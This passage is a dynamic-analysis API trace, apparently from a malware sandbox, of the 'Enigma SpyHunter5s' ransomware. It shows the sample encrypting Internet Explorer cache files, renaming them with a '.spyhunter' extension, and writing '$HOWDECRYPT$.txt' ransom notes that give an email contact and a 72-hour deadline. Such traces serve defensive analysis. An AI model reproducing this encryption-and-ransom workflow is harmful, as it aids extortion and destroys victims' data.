Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0156.266] StrStrW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0156.266] GetProcessHeap () returned 0x2c0000 [0156.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.266] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebac*=0x1200, lpOverlapped=0x0) returned 1 [0156.271] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.271] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebac*=0x1200, lpOverlapped=0x0) returned 1 [0156.271] GetProcessHeap () returned 0x2c0000 [0156.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.271] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.271] WriteFile (in: hFile=0x178, lpBuffer=0x57ebec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x57ebec*, lpNumberOfBytesWritten=0x57ebac*=0x4, lpOverlapped=0x0) returned 1 [0156.271] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57ebac*=0x30, lpOverlapped=0x0) returned 1 [0156.271] CloseHandle (hObject=0x178) returned 1 [0156.271] GetProcessHeap () returned 0x2c0000 [0156.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.272] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.spyhunter") returned 163 [0156.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat.spyhunter")) returned 1 [0156.272] GetProcessHeap () returned 0x2c0000 [0156.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.272] GetProcessHeap () returned 0x2c0000 [0156.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.272] GetProcessHeap () returned 0x2c0000 [0156.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22c18 | out: hHeap=0x2c0000) returned 1 [0156.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.274] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.274] WriteFile (in: hFile=0x178, lpBuffer=0x57eb1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec48, lpOverlapped=0x0 | out: lpBuffer=0x57eb1f*, lpNumberOfBytesWritten=0x57ec48*=0x127, lpOverlapped=0x0) returned 1 [0156.274] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.274] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec48*=0x2ac, lpOverlapped=0x0) returned 1 [0156.275] CloseHandle (hObject=0x178) returned 1 [0156.275] GetProcessHeap () returned 0x2c0000 [0156.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc4f0 | out: hHeap=0x2c0000) returned 1 [0156.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebe8 | out: pbBuffer=0x57ebe8) returned 1 [0156.275] GetProcessHeap () returned 0x2c0000 [0156.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57ebe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57ebe0*=0x30) returned 1 [0156.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0156.276] StrStrW (lpFirst="MSIMGSIZ.DAT", lpSrch=".txt") returned 0x0 [0156.276] GetProcessHeap () returned 0x2c0000 [0156.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.276] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eba4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57eba4*=0x2800, lpOverlapped=0x0) returned 1 [0156.277] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.277] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eba4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57eba4*=0x2800, lpOverlapped=0x0) returned 1 [0156.277] GetProcessHeap () returned 0x2c0000 [0156.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.278] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.278] WriteFile (in: hFile=0x178, lpBuffer=0x57ebe4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eba4, lpOverlapped=0x0 | out: lpBuffer=0x57ebe4*, lpNumberOfBytesWritten=0x57eba4*=0x4, lpOverlapped=0x0) returned 1 [0156.278] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eba4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57eba4*=0x30, lpOverlapped=0x0) returned 1 [0156.278] CloseHandle (hObject=0x178) returned 1 [0156.278] GetProcessHeap () returned 0x2c0000 [0156.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.278] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.spyhunter") returned 98 [0156.278] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.spyhunter")) returned 1 [0156.279] GetProcessHeap () returned 0x2c0000 [0156.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.279] GetProcessHeap () returned 0x2c0000 [0156.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.279] GetProcessHeap () returned 0x2c0000 [0156.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45628 | out: hHeap=0x2c0000) returned 1 [0156.279] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebe0 | out: pbBuffer=0x57ebe0) returned 1 [0156.280] GetProcessHeap () returned 0x2c0000 [0156.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.280] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57ebd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57ebd8*=0x30) returned 1 [0156.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0156.280] StrStrW (lpFirst="frameiconcache.dat", lpSrch=".txt") returned 0x0 [0156.280] GetProcessHeap () returned 0x2c0000 [0156.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.280] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57eb9c*=0x23f4, lpOverlapped=0x0) returned 1 [0156.343] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffdc0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.343] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x23f4, lpNumberOfBytesWritten=0x57eb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57eb9c*=0x23f4, lpOverlapped=0x0) returned 1 [0156.343] GetProcessHeap () returned 0x2c0000 [0156.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.343] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.343] WriteFile (in: hFile=0x178, lpBuffer=0x57ebdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb9c, lpOverlapped=0x0 | out: lpBuffer=0x57ebdc*, lpNumberOfBytesWritten=0x57eb9c*=0x4, lpOverlapped=0x0) returned 1 [0156.343] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb9c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57eb9c*=0x30, lpOverlapped=0x0) returned 1 [0156.343] CloseHandle (hObject=0x178) returned 1 [0156.344] GetProcessHeap () returned 0x2c0000 [0156.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.344] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat.spyhunter") returned 104 [0156.344] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat.spyhunter")) returned 1 [0156.344] GetProcessHeap () returned 0x2c0000 [0156.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.345] GetProcessHeap () returned 0x2c0000 [0156.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.345] GetProcessHeap () returned 0x2c0000 [0156.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4beb0 | out: hHeap=0x2c0000) returned 1 [0156.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.346] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.346] WriteFile (in: hFile=0x178, lpBuffer=0x57eb13*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec3c, lpOverlapped=0x0 | out: lpBuffer=0x57eb13*, lpNumberOfBytesWritten=0x57ec3c*=0x127, lpOverlapped=0x0) returned 1 [0156.347] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.347] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec3c*=0x2ac, lpOverlapped=0x0) returned 1 [0156.347] CloseHandle (hObject=0x178) returned 1 [0156.347] GetProcessHeap () returned 0x2c0000 [0156.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38f40 | out: hHeap=0x2c0000) returned 1 [0156.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.367] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.367] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec38, lpOverlapped=0x0 | out: lpBuffer=0x57eb0f*, lpNumberOfBytesWritten=0x57ec38*=0x127, lpOverlapped=0x0) returned 1 [0156.368] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.368] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec38*=0x2ac, lpOverlapped=0x0) returned 1 [0156.368] CloseHandle (hObject=0xb0) returned 1 [0156.369] GetProcessHeap () returned 0x2c0000 [0156.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b880 | out: hHeap=0x2c0000) returned 1 [0156.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebd8 | out: pbBuffer=0x57ebd8) returned 1 [0156.369] GetProcessHeap () returned 0x2c0000 [0156.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ebd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ebd0*=0x30) returned 1 [0156.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.369] GetProcessHeap () returned 0x2c0000 [0156.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.369] GetProcessHeap () returned 0x2c0000 [0156.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d648 | out: hHeap=0x2c0000) returned 1 [0156.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebd0 | out: pbBuffer=0x57ebd0) returned 1 [0156.369] GetProcessHeap () returned 0x2c0000 [0156.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ebc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ebc8*=0x30) returned 1 [0156.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.369] GetProcessHeap () returned 0x2c0000 [0156.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.370] GetProcessHeap () returned 0x2c0000 [0156.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cec8 | out: hHeap=0x2c0000) returned 1 [0156.370] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebd0 | out: pbBuffer=0x57ebd0) returned 1 [0156.370] GetProcessHeap () returned 0x2c0000 [0156.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.370] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ebc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ebc8*=0x30) returned 1 [0156.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0156.370] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0156.370] GetProcessHeap () returned 0x2c0000 [0156.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.371] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57eb8c*=0x2800, lpOverlapped=0x0) returned 1 [0156.372] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.372] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57eb8c*=0x2800, lpOverlapped=0x0) returned 1 [0156.372] GetProcessHeap () returned 0x2c0000 [0156.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.372] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.372] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb8c, lpOverlapped=0x0 | out: lpBuffer=0x57ebcc*, lpNumberOfBytesWritten=0x57eb8c*=0x4, lpOverlapped=0x0) returned 1 [0156.372] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, 